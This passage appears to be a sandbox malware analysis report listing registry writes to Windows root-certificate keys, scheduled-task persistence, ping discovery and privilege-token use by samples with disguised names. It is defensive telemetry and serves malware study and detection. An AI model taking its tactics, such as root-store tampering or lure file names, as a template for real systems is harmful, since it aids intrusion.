Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	._cache_New Text Document mod.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6	._cache_Synaptics.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	._cache_New Text Document mod.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	._cache_New Text Document mod.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	._cache_New Text Document mod.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	._cache_Synaptics.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	._cache_Synaptics.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	._cache_Synaptics.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 040000000100000010000000324a4bbbc863699bbe749ac6dd1d46240f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a190000000100000010000000fd960962ac6938e0d4b0769aa1a64e262000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	._cache_New Text Document mod.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	._cache_Synaptics.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	._cache_Synaptics.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	._cache_New Text Document mod.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	._cache_New Text Document mod.exe

Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery

T1018

pid	Process
3064	PING.EXE
1356	PING.EXE
2788	PING.EXE
1588	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2748	schtasks.exe
864	schtasks.exe
2556	schtasks.exe
2884	schtasks.exe
2360	schtasks.exe
2508	schtasks.exe
2996	schtasks.exe
2160	schtasks.exe
1800	schtasks.exe
1088	SCHTASKS.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1504	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe
1968	4909_7122.exe

Suspicious use of AdjustPrivilegeToken 36 IoCs

description	pid	Process
Token: SeDebugPrivilege	2232	._cache_Synaptics.exe
Token: SeDebugPrivilege	2228	._cache_New Text Document mod.exe
Token: SeDebugPrivilege	2204	powershell.exe
Token: SeDebugPrivilege	1028	powershell.exe
Token: SeDebugPrivilege	1332	powershell.exe
Token: SeDebugPrivilege	2476	Updater.exe
Token: SeDebugPrivilege	2580	NewApp.exe
Token: SeShutdownPrivilege	316	powercfg.exe
Token: SeShutdownPrivilege	2560	powercfg.exe
Token: SeShutdownPrivilege	3032	powercfg.exe
Token: SeShutdownPrivilege	1592	powercfg.exe
Token: SeDebugPrivilege	3008	powershell.exe
Token: SeShutdownPrivilege	276	powercfg.exe
Token: SeShutdownPrivilege	1684	powercfg.exe
Token: SeShutdownPrivilege	1740	powercfg.exe
Token: SeShutdownPrivilege	1108	powercfg.exe
Token: SeLockMemoryPrivilege	828	explorer.exe
Token: SeDebugPrivilege	1932	Wallet-PrivateKey.Pdf.exe
Token: SeDebugPrivilege	2648	Pdf%20Reader.exe
Token: SeDebugPrivilege	1280	Client-base.exe
